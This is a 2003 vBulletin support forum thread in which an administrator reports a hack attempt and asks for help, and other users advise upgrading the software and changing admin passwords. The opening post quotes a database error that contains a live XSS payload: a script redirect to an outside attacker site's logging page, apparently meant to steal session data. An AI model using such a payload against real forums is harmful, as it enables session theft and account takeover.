Announcement

Collapse
No announcement yet.

Hack attempt...

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts
    Steve Machol
    Former Customer Support Manager

  • Steve Machol
    replied
    Immediately do what xiphoid suggested:

    Originally posted by xiphoid
    Upgrade your forum to 2.3.0 a.s.a.p and .htaccess/.htpasswd protect your admin/mod/ dirs and change all your admin passwords.

    Leave a comment:

  • mindbuster
    Senior Member

  • mindbuster
    replied
    Ohh, ok beorn, anyway i edited the links out.

    Leave a comment:

  • Beorn
    Senior Member

  • Beorn
    replied
    EDIT: Ignore what this said...the script contains a redirect to the referrer....
    Beorn
    Senior Member
    Last edited by Beorn; Sat 31 May '03, 9:48am.

    Leave a comment:

  • phill2003
    Senior Member

  • phill2003
    replied
    if you go into the admin cp look up your name on the user list there is an option to change your password...

    Leave a comment:

  • mindbuster
    Senior Member

  • mindbuster
    replied
    Xiphiod, sure, changing password is a safety precaution, but could you explain what the attack could have done? could he have fetched the encrypted password list? is that why he signed up as member himself, then changed his password to easier decrypt the password list?

    Where can i read about changes from vB 2.8.0 to vB 2.9.0 ?

    And btw, umm, how do i change admin passwords? Within vBulletin or the admin UI?
    mindbuster
    Senior Member
    Last edited by mindbuster; Sat 31 May '03, 7:01am.

    Leave a comment:

  • mindbuster
    Senior Member

  • mindbuster
    replied
    Umm, maybe i should be more specific, the vbexploit.php file is NOT on MY site ( www.hitman2forum.com ) , i have nothing to do with the http://george.modders.net/vbexploit.php?Action=Log site, thats the hacker site.

    If you try and click the link to the hackers site you can see it just keeps refreshing.

    I looked inside my members2.php file and there are no traces of any link to the above mentioned site.

    Leave a comment:

  • Floris
    Senior Member

  • Floris
    replied
    Upgrade your forum to 2.3.0 a.s.a.p and .htaccess/.htpasswd protect your admin/mod/ dirs and change all your admin passwords.

    Leave a comment:

  • Equ1n0x
    Senior Member

  • Equ1n0x
    replied
    vBulletin XSS Injection Vulnerability: Exploit
    Coded By: Sp.IC--------------------------------------------------------------------------------

    its NOT A VB FILE suggest you remove it, and execute who put it there

    Leave a comment:

  • Icheb
    Senior Member

  • Icheb
    replied
    vbexploit.php is no vB file. What does it do?

    Leave a comment:

  • mindbuster
    Senior Member

  • mindbuster
    started a topic Hack attempt...

    Hack attempt...

    I checked my email today and had gotten 6 mails concerning "database error".

    Someone have tried, dunno if the person suceeded, in hacking/exploiting my boards.

    Here is one of the emails with the errors...
    ----------------------------------------
    Database error in vBulletin 2.2.8:

    Invalid SQL: SELECT thread.threadid
    FROM thread,subscribethread
    WHERE subscribethread.threadid=thread.threadid
    AND subscribethread.userid='1071'
    AND thread.visible=1 AND lastpost >= 1051784537
    ORDER BY lastpost DESC
    LIMIT 0,><Script>location='Http://george.modders.net/vbexploit.php?Action=Log

    mysql error: You have an error in your SQL syntax near '><Script>location='Http://george.modders.net/vbexploit.php?Action=Log
    ' at line 7

    mysql error number: 1064

    Date: Saturday 31st of May 2003 12:22:17 PM
    Script:

    LINKS EDITED OUT
    ---------------------------------------------

    As you can see it was from someone at...

    Edit: i have removed the direct link now after beorn's post, any admin/mod can msg me to get the links/the dudes email address/ and his IP address if needed.

    Dunno if anything has happened, damaged, or if the exploiter got any info he shouldnt have as it was member2.php that is listed in the mail.

    Could anyone tell if it has done any harm?
    Should i close down the boards?

    Thanks.

    /edit

    Update:

    Just found out that the exploiter actually signed up as member on my boards so i have his email address and IP address....
    mindbuster
    Senior Member
    Last edited by mindbuster; Sat 31 May '03, 9:52am.
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X